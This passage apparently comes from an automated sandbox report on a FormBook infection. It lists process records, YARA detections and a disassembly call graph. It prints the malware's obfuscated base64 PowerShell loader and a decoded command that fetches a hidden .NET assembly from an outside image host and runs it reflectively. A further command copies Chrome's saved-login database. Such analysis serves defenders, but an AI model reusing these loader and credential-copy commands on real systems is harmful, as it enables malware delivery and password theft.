eG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHcDgTreQgBVDgTreGcDgTrecDgTreDgTre2DgTreHEDgTreeQBzDgTreEYDgTreNQDgTre4DgTreGkDgTreSgBBDgTreCEDgTrePQB5DgTreGUDgTreawBoDgTreHQDgTredQBhDgTreCYDgTreMgDgTrexDgTreDEDgTreMQDgTreyDgTreCUDgTreMDgTreDgTre4DgTreDEDgTreNgDgTre4DgTreEMDgTreMwBDDgTreDQDgTreRgDgTrezDgTreDYDgTreRgDgTre2DgTreEUDgTreNDgTreDgTre9DgTreGQDgTreaQBzDgTreGUDgTrecgDgTre/DgTreGQDgTreYQBvDgTreGwDgTrebgB3DgTreG8DgTreZDgTreDgTrevDgTreG0DgTrebwBjDgTreC4DgTreZQB2DgTreGkDgTrebDgTreDgTreuDgTreGUDgTredgBpDgTreHIDgTreZDgTreBlDgTreG4DgTrebwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                Start time:21:11:14
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                Start time:21:11:15
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
                                                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                Start time:21:11:26
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                Imagebase:0x2a0000
                                                                                                                                                                                                                                                                File size:262'432 bytes
                                                                                                                                                                                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                Start time:21:11:26
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                Imagebase:0x8b0000
                                                                                                                                                                                                                                                                File size:262'432 bytes
                                                                                                                                                                                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                Start time:21:11:26
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:21:11:31
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                                                                                                                                                                                Imagebase:0xe0000
                                                                                                                                                                                                                                                                File size:86'528 bytes
                                                                                                                                                                                                                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                Start time:21:11:36
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                Start time:21:11:36
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                Start time:21:11:48
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 00007FFD9B8037B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2266027879.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b800000_powershell.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9678f6b68ba26b14af2d1c4a208d741aea42871c2c9e7adfba0676239879714c
                                                                                                                                                                                                                                                                  • Instruction ID: 4527fd586dea0d27192c03b38eff8d019123b43e89e37b519467d7e121d1f367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9678f6b68ba26b14af2d1c4a208d741aea42871c2c9e7adfba0676239879714c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7701A77021CB0C8FD748EF0CE051AAAB3E0FF99360F10056DE58AC36A1D632E882CB41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:1.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                                                                                                                  Total number of Nodes:555
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:71
                                                                                                                                                                                                                                                                  execution_graph 81329 41f040 81332 41b960 81329->81332 81333 41b986 81332->81333 81340 409d30 81333->81340 81335 41b992 81339 41b9b3 81335->81339 81348 40c1b0 81335->81348 81337 41b9a5 81384 41a6a0 81337->81384 81341 409d3d 81340->81341 81388 409c80 81340->81388 81343 409d44 81341->81343 81400 409c20 81341->81400 81343->81335 81349 40c1d5 81348->81349 81816 40b1b0 81349->81816 81351 40c22c 81820 40ae30 81351->81820 81353 40c4a3 81353->81337 81354 40c252 81354->81353 81829 414390 81354->81829 81356 40c297 81356->81353 81832 408a60 81356->81832 81358 40c2db 81358->81353 81839 41a4f0 81358->81839 81362 40c331 81363 40c338 81362->81363 81851 41a000 81362->81851 81364 41bdc0 2 API calls 81363->81364 81366 40c345 81364->81366 81366->81337 81368 40c382 81369 41bdc0 2 API calls 81368->81369 81370 40c389 81369->81370 81370->81337 81371 40c392 81372 40f490 3 API calls 81371->81372 81373 40c406 81372->81373 81373->81363 81374 40c411 81373->81374 81375 41bdc0 2 API calls 81374->81375 81376 40c435 81375->81376 81856 41a050 81376->81856 81379 41a000 2 API calls 81380 40c470 81379->81380 81380->81353 81861 419e10 81380->81861 81383 41a6a0 2 API calls 81383->81353 81385 41a6bf ExitProcess 81384->81385 81386 41af50 LdrLoadDll 81384->81386 81386->81385 81389 409c93 81388->81389 81439 418bb0 LdrLoadDll 81388->81439 81419 418a60 81389->81419 81392 409ca6 81392->81341 81393 409c9c 81393->81392 81422 41b2a0 81393->81422 81395 409ce3 81395->81392 81433 409aa0 81395->81433 81397 409d03 81440 409620 LdrLoadDll 81397->81440 81399 409d15 81399->81341 81401 409c3a 81400->81401 81402 41b590 LdrLoadDll 81400->81402 81791 41b590 81401->81791 81402->81401 81405 41b590 LdrLoadDll 81406 409c61 81405->81406 81407 40f170 81406->81407 81408 40f189 81407->81408 81799 40b030 81408->81799 81410 40f19c 81803 41a1d0 81410->81803 81413 409d55 81413->81335 81415 40f1c2 81416 40f1ed 81415->81416 81809 41a250 81415->81809 81418 41a480 2 API calls 81416->81418 81418->81413 81441 41a5f0 81419->81441 81423 41b2b9 81422->81423 81454 414a40 81423->81454 81425 41b2d1 81426 41b2da 81425->81426 81493 41b0e0 81425->81493 81426->81395 81428 41b2ee 81428->81426 81511 419ef0 81428->81511 81769 407ea0 81433->81769 81435 409ac1 81435->81397 81436 409aba 81436->81435 81782 408160 81436->81782 81439->81389 81440->81399 81442 418a75 81441->81442 81444 41af50 81441->81444 81442->81393 81445 41af60 81444->81445 81447 41af82 81444->81447 81448 414e40 81445->81448 81447->81442 81449 414e5a 81448->81449 81450 414e4e 81448->81450 81449->81447 81450->81449 81453 4152c0 LdrLoadDll 81450->81453 81452 414fac 81452->81447 81453->81452 81455 414d75 81454->81455 81456 414a54 81454->81456 81455->81425 81456->81455 81519 419c40 81456->81519 81459 414b80 81522 41a350 81459->81522 81460 414b63 81579 41a450 LdrLoadDll 81460->81579 81463 414ba7 81465 41bdc0 2 API calls 81463->81465 81464 414b6d 81464->81425 81467 414bb3 81465->81467 81466 414d39 81469 41a480 2 API calls 81466->81469 81467->81464 81467->81466 81468 414d4f 81467->81468 81473 414c42 81467->81473 81588 414780 LdrLoadDll NtReadFile NtClose 81468->81588 81471 414d40 81469->81471 81471->81425 81472 414d62 81472->81425 81474 414ca9 81473->81474 81476 414c51 81473->81476 81474->81466 81475 414cbc 81474->81475 81581 41a2d0 81475->81581 81478 414c56 81476->81478 81479 414c6a 81476->81479 81580 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81478->81580 81482 414c87 81479->81482 81483 414c6f 81479->81483 81482->81471 81537 414400 81482->81537 81525 4146e0 81483->81525 81485 414c60 81485->81425 81488 414d1c 81585 41a480 81488->81585 81489 414c7d 81489->81425 81490 414c9f 81490->81425 81492 414d28 81492->81425 81494 41b0f1 81493->81494 81495 41b103 81494->81495 81606 41bd40 81494->81606 81495->81428 81497 41b124 81609 414060 81497->81609 81499 41b170 81499->81428 81500 41b147 81500->81499 81501 414060 3 API calls 81500->81501 81504 41b169 81501->81504 81503 41b1fa 81505 41b20a 81503->81505 81735 41aef0 LdrLoadDll 81503->81735 81504->81499 81641 415380 81504->81641 81651 41ad60 81505->81651 81508 41b238 81730 419eb0 81508->81730 81512 419f0c 81511->81512 81513 41af50 LdrLoadDll 81511->81513 81763 13c2c0a 81512->81763 81513->81512 81514 419f27 81516 41bdc0 81514->81516 81766 41a660 81516->81766 81518 41b349 81518->81395 81520 41af50 LdrLoadDll 81519->81520 81521 414b34 81520->81521 81521->81459 81521->81460 81521->81464 81523 41af50 LdrLoadDll 81522->81523 81524 41a36c NtCreateFile 81523->81524 81524->81463 81526 4146fc 81525->81526 81527 41a2d0 LdrLoadDll 81526->81527 81528 41471d 81527->81528 81529 414724 81528->81529 81530 414738 81528->81530 81532 41a480 2 API calls 81529->81532 81531 41a480 2 API calls 81530->81531 81533 414741 81531->81533 81534 41472d 81532->81534 81589 41bfd0 LdrLoadDll RtlAllocateHeap 81533->81589 81534->81489 81536 41474c 81536->81489 81538 41444b 81537->81538 81539 41447e 81537->81539 81540 41a2d0 LdrLoadDll 81538->81540 81541 4145c9 81539->81541 81545 41449a 81539->81545 81542 414466 81540->81542 81543 41a2d0 LdrLoadDll 81541->81543 81544 41a480 2 API calls 81542->81544 81549 4145e4 81543->81549 81546 41446f 81544->81546 81547 41a2d0 LdrLoadDll 81545->81547 81546->81490 81548 4144b5 81547->81548 81551 4144d1 81548->81551 81552 4144bc 81548->81552 81602 41a310 LdrLoadDll 81549->81602 81553 4144d6 81551->81553 81554 4144ec 81551->81554 81556 41a480 2 API calls 81552->81556 81557 41a480 2 API calls 81553->81557 81564 4144f1 81554->81564 81590 41bf90 81554->81590 81555 41461e 81558 41a480 2 API calls 81555->81558 81559 4144c5 81556->81559 81560 4144df 81557->81560 81561 414629 81558->81561 81559->81490 81560->81490 81561->81490 81572 414503 81564->81572 81593 41a400 81564->81593 81565 414557 81566 41456e 81565->81566 81601 41a290 LdrLoadDll 81565->81601 81568 414575 81566->81568 81569 41458a 81566->81569 81570 41a480 2 API calls 81568->81570 81571 41a480 2 API calls 81569->81571 81570->81572 81573 414593 81571->81573 81572->81490 81574 4145bf 81573->81574 81596 41bb90 81573->81596 81574->81490 81576 4145aa 81577 41bdc0 2 API calls 81576->81577 81578 4145b3 81577->81578 81578->81490 81579->81464 81580->81485 81582 41af50 LdrLoadDll 81581->81582 81583 414d04 81582->81583 81584 41a310 LdrLoadDll 81583->81584 81584->81488 81586 41a49c NtClose 81585->81586 81587 41af50 LdrLoadDll 81585->81587 81586->81492 81587->81586 81588->81472 81589->81536 81591 41bfa8 81590->81591 81603 41a620 81590->81603 81591->81564 81594 41af50 LdrLoadDll 81593->81594 81595 41a41c NtReadFile 81594->81595 81595->81565 81597 41bbb4 81596->81597 81598 41bb9d 81596->81598 81597->81576 81598->81597 81599 41bf90 2 API calls 81598->81599 81600 41bbcb 81599->81600 81600->81576 81601->81566 81602->81555 81604 41af50 LdrLoadDll 81603->81604 81605 41a63c RtlAllocateHeap 81604->81605 81605->81591 81736 41a530 81606->81736 81608 41bd6d 81608->81497 81610 414071 81609->81610 81611 414079 81609->81611 81610->81500 81640 41434c 81611->81640 81739 41cf30 81611->81739 81613 4140cd 81614 41cf30 2 API calls 81613->81614 81615 4140d8 81614->81615 81616 414126 81615->81616 81619 41d060 3 API calls 81615->81619 81750 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 81615->81750 81618 41cf30 2 API calls 81616->81618 81621 41413a 81618->81621 81619->81615 81620 414197 81622 41cf30 2 API calls 81620->81622 81621->81620 81744 41d060 81621->81744 81624 4141ad 81622->81624 81625 4141ea 81624->81625 81628 41d060 3 API calls 81624->81628 81626 41cf30 2 API calls 81625->81626 81627 4141f5 81626->81627 81629 41d060 3 API calls 81627->81629 81635 41422f 81627->81635 81628->81624 81629->81627 81631 414324 81752 41cf90 LdrLoadDll RtlFreeHeap 81631->81752 81633 41432e 81753 41cf90 LdrLoadDll RtlFreeHeap 81633->81753 81751 41cf90 LdrLoadDll RtlFreeHeap 